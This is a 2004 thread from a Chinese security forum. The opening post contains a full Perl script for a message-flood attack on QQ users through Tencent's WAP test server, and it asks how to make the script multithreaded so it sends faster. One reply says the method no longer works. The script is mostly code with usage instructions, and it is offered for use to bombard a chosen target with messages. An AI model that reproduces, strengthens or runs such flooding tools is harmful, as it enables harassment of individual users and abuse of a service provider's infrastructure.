|
 | 作者: enegy [enegy]
 论坛用户 |
登录 |
| 这是一个基于WAP的QQ消息洪水攻击的代码。 1. 能不能把这段代码变成多线程的。 2. “平均一秒钟可以发送7-8条信息给被攻击者”――这意味着对于什么样的网络带宽、机器配置的用户能起到较好的作用。 具体供给方法:http://www.topicer.com/xren/article/list.asp?id=985 #!/usr/bin/perl #Code By Roy<Roy@c4st.cn> #Script For QQ Attacking $|=1; use Socket; use Getopt::Std; #获取外部参数 getopt('aytgkl'); print "\n ===================================================\n"; print " Perl Script For QQ Attacking\n"; print " Code By Roy<Roy@c4st.cn> \n"; print " Visit:luoyi.com & c4st.cn \n"; print " ===================================================\n"; #参数不符合要求则显示使用方法 &usage unless ( defined($opt_a) && defined($opt_y) && defined($opt_t) && defined($opt_g) && defined($opt_k)); #将外部参数赋给内部变量 $mode=$opt_a; $time=$opt_l||1; $urqq=$opt_y; $targ=$opt_t; $pg=$opt_g; $pk=$opt_k; #定义了攻击中使用到的服务器,waptest.tencent.com是WAPQQ免费体验用的服务器 $host="waptest.tencent.com"; $port=80; #采用"验证请求"方式攻击 if ($mode eq "c"){ print"Attacking ..."; for ($i=1;$i<=$time;$i++){ &attack2; } print"\nDone!."; } #采用"普通消息"方式攻击 elsif ($mode eq "n"){ print"Attacking ..."; for ($i=1;$i<=$time;$i++){ &attack1; } print"\nDone!."; } else {&usage}; #"普通消息"方式攻击函数,被攻击者将收到类似"10001 Is Coming"的信息,如果要修改信息内容,请修改Psendmsg变量 sub attack1 { $req = "GET /cgi-bin/wapqq_chat.cgi?Pc=11&Pq=$urqq&Pg=$pg&Poq=$targ&Pk=$pk&Psendmsg=$urqq%20Is%20Coming&PMisc_mid=123456789&stn=gmcc_try HTTP/1.1\n". "Accept: text/vnd.wap.wml, application/vnd.wap.wmlc, image/vnd.wap.wbmp, image/gif, image/jpeg, text/vnd.wap.wmlscript, application/vnd.wap.wmlscriptc\n". "User-Agent: C4ST(^-^)\n". "Host: waptest.tencent.com\n". "\n\n"; print "\n"; sendraw($req); } #"验证请求"方式攻击函数,被攻击者将收到类似"10001 Is Coming"的信息,如果要修改信息内容,请修改PConfirmInfo变量 sub attack2 { $req = "GET /cgi-bin/wapqq_chat.cgi?Pc=27&Pq=$urqq&Pg=$pg&Poq=$targ&Pk=$pk&PConfirmInfo=$urqq%20Is%20Coming&PMisc_mid=123456789&stn=gmcc_try HTTP/1.1\n". "Accept: text/vnd.wap.wml, application/vnd.wap.wmlc, image/vnd.wap.wbmp, image/gif, image/jpeg, text/vnd.wap.wmlscript, application/vnd.wap.wmlscriptc\n". "User-Agent: C4ST(^-^)\n". "Host: waptest.tencent.com\n". "\n\n"; print "\n"; sendraw($req); } #显示使用方法的函数,PG和PK的值可以在登陆WAPQQ后查看源代码而得到 sub usage { print qq~ Usage: $0 -a <Attack Mode> -l <Loops Of Attacking> -y <Your QQ Number> -t <Target To Attack> -pg <PG For Your WAPQQ> -pk <PK For Your Session> -a =Attack Mode,Choose "n" For Normal QQ Msg Type,Or Choose "c" For Confirm QQ Msg Type -l =Loops Of Attacking,The Times To Attack The Target -y =Your QQ Number -t =Target To Attack,QQ Number -g =PG For Your WAPQQ(1) -k =PK For Your Session(1) (1)HowTo Get PG And PK: PG is your QQ password's hash used in WAPQQ site.PK is the session id for your current visiting at WAPQQ site.You can get them once you logged on WAPQQ via your mobile,wap browser(eg.WinWAP) or wap2web service(eg.http://www.easywap.ch/Wap2Web.html). ~; exit; } #Socket函数 sub sendraw { my ($req) = @_; my $target; $target = inet_aton($host) || die("inet_aton problems\n"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ select(S); $| = 1; print $req; close(S); return true; } else { die("Can't connect...\n"); } } |
| 地主 发表时间: 04-02-03 22:21 |
 | 回复: afan271314 [afan271314]  论坛用户 |
登录 |
|
早就未有用了 |
| B1层 发表时间: 04-02-04 11:07 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 编程破解
标题: 关于“基于WAP的QQ消息洪水攻击”的几点想法